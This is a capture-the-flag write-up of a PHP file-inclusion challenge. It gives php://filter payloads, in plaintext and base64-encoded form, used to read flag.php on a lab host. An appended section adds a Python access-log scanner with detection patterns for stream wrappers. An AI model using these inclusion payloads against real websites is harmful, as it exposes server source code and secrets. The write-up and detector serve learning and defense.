Open the challenge environment:
![[ACTF2020 新生赛]Include 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030219364.jpg)
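The challenge name hints at include, which suggests using php://filter to read files.
Payloads for reading a file:
```
# Plaintext read
index.php?file1=php://filter/resource=file.txt
# Encoded read
index.php?file1=php://filter/read=convert.base64-encode/resource=file.txt
```
Constructed payloads: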
http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/resource=flag.php
http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php
![[ACTF2020 新生赛]Include 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030220589.jpg)
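The plaintext read does not work, because the included flag.php is executed as PHP rather than displayed, so try the encoded read: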
![[ACTF2020 新生赛]Include 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030222955.jpg)
Got the flag!
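From the defender's side, the requests used above stand out in web-server access logs. The following is an added example, not part of the original post: a Python scanner that decodes query parameters (including repeated percent-encoding) and flags stream-wrapper values such as php://filter. The wrapper watch-list, function names and log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed watch-list: PHP stream wrappers that should never appear in a file parameter.
WRAPPER_RE = re.compile(r"^\s*(php|data|phar|zip|expect|glob|file)://", re.I)
# php://filter chains that transform file contents (e.g. convert.base64-encode).
FILTER_RE = re.compile(r"php://filter/.*(convert|string|zlib)\.", re.I)
# Request target inside a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so php%253A%252F%252F is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(log_line):
    """Return (param, decoded_value, reason) findings for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl already decoded one round
        if FILTER_RE.search(value):
            findings.append((name, value, "php://filter with content filter"))
        elif WRAPPER_RE.search(value):
            findings.append((name, value, "stream wrapper in parameter"))
    return findings

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2022:03:02:19 +0000] "GET /?file=about.txt HTTP/1.1" 200 310',
    '203.0.113.7 - - [10/Jul/2022:03:02:20 +0000] "GET /?file=php://filter/resource=flag.php HTTP/1.1" 200 98',
    '203.0.113.7 - - [10/Jul/2022:03:02:22 +0000] "GET /?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 140',
    '203.0.113.7 - - [10/Jul/2022:03:02:25 +0000] "GET /?file=php%253A%252F%252Ffilter%252Fresource%253Dflag.php HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value, reason in inspect_request(line):
            print(f"ALERT {reason}: {name}={value}")
```

Log-based detection complements, but does not replace, the server-side fix of mapping the parameter to an allowlist of permitted files instead of passing user input to include.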
Original article by wure. If you repost it, please credit the source: https://blog.ytso.com/tech/pnotes/273237.html